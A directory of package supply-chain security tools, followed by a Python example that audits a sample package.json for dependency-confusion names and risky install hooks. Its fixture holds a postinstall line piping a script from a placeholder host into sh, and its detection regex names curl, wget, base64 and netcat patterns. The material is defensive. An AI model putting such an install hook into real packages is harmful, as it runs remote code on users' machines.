Package Security
Browse 14 package security tools
FEATURED
Detects and blocks malicious/vulnerable open source packages in supply chains.
Database for researching & tracking open source components with safety scores.
Tool for searching, comparing, and evaluating open source dependencies.
Malware-resistant software libraries rebuilt from source for multiple languages.
Software supply chain security platform detecting malware in dependencies
Detects malicious open-source packages across SDLC using 410K+ package database
Software supply chain security platform with SCA, package firewall & threat intel
OpenSCA Project is a dependency security scanner that runs in the browser.
A security tool that detects potential Dependency Confusion attack vectors by identifying private package names that are not reserved on public registries.
A dependency security analysis tool that identifies potential risks in project dependencies including unsafe lock files, installation scripts, obfuscated code, and dangerous shell commands.
A Python script that scans Nexus Repository Manager for artifacts with identical names across repositories to identify dependency confusion attack vulnerabilities.
GuardDog is a CLI tool that identifies malicious PyPI and npm packages using heuristics-based analysis of source code and metadata.
npm-zoo is a curated database of known malicious NPM packages that helps developers and security researchers identify and avoid potentially harmful dependencies in their projects.
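The two checks that several of the tools above perform, finding private dependency names that are unclaimed on a public registry (the dependency-confusion scanners) and flagging install-time scripts that run dangerous shell commands (the lock-file and install-script analyser), fit in one short script. The code below is an added example written for this page, not code from any of the listed projects. It audits a constructed `package.json`; the public-registry lookup is a stand-in dictionary, and the assumption that a real implementation would treat an HTTP 404 from `https://registry.npmjs.org/<name>` as "unclaimed" is exactly that, an assumption. The organisation naming prefixes (`acme-`, `@acme/`) are hypothetical.

```python
import json
import re

# Constructed sample package.json for a fictional internal service; not a real project.
SAMPLE_PACKAGE_JSON = r'''
{
  "name": "@acme/billing-service",
  "version": "1.4.2",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "node scripts/setup.js && curl -s http://example.invalid/x.sh | sh"
  },
  "dependencies": {
    "express": "^4.18.2",
    "acme-internal-logger": "2.0.0",
    "@acme/auth-client": "^3.1.0",
    "lodash": "^4.17.21"
  },
  "devDependencies": {
    "acme-test-utils": "1.0.0"
  }
}
'''

# Constructed stand-in for the public registry: True if the name already exists there.
# Assumption: a real check would GET https://registry.npmjs.org/<name> and treat a 404 as unclaimed.
PUBLIC_REGISTRY = {
    "express": True,
    "lodash": True,
    "acme-internal-logger": False,   # nobody owns this on the public registry: an attacker could
    "@acme/auth-client": True,       # scope reserved by the org on the public registry, so safe
    "acme-test-utils": False,
}


def public_registry_has(name: str) -> bool:
    """Offline lookup against the constructed registry table."""
    return PUBLIC_REGISTRY.get(name, False)


# Lifecycle hooks the package manager runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns for commands that should never run at install time:
# fetch-and-pipe-to-shell, decode-and-pipe-to-shell, and raw netcat use. Tune per codebase.
DANGEROUS_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash)\b"
    r"|\bbase64\s+(?:-d|--decode)\b[^|;&]*\|\s*(?:sh|bash)\b"
    r"|\b(?:nc|ncat|netcat)\b"
)


def is_private_name(name: str, private_prefixes) -> bool:
    """A dependency is treated as internal if it carries one of the organisation's prefixes."""
    return any(name.startswith(p) for p in private_prefixes)


def find_confusion_candidates(manifest: dict, private_prefixes, registry_has):
    """Internal-looking dependency names that are not claimed on the public registry."""
    found = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            if is_private_name(name, private_prefixes) and not registry_has(name):
                found.append(name)
    return sorted(found)


def find_risky_scripts(manifest: dict):
    """Every install-time hook, with a flag when its command matches a dangerous shell pattern."""
    scripts = manifest.get("scripts", {})
    result = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        result.append({
            "hook": hook,
            "command": cmd,
            "dangerous": bool(DANGEROUS_SHELL.search(cmd)),
        })
    return result


def audit_manifest(text: str, private_prefixes, registry_has=public_registry_has):
    """Run both checks over a package.json document and return the findings."""
    manifest = json.loads(text)
    return {
        "confusion_candidates": find_confusion_candidates(manifest, private_prefixes, registry_has),
        "risky_scripts": find_risky_scripts(manifest),
    }


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_PACKAGE_JSON, private_prefixes=("acme-", "@acme/"))
    for name in report["confusion_candidates"]:
        print(f"[confusion] {name}: unclaimed on the public registry; reserve it or scope installs to the private registry")
    for s in report["risky_scripts"]:
        label = "DANGEROUS" if s["dangerous"] else "review"
        print(f"[script:{label}] {s['hook']}: {s['command']}")
```

Two points the output makes that the one-line descriptions do not: the scoped package `@acme/auth-client` is not reported because the organisation already holds that scope on the public registry, which is the cheapest fix for dependency confusion, whereas the unscoped `acme-*` names have no such protection; and the `postinstall` hook is flagged for its pipe-to-shell pattern even though its first command looks benign, because the whole command line is evaluated, not just its prefix.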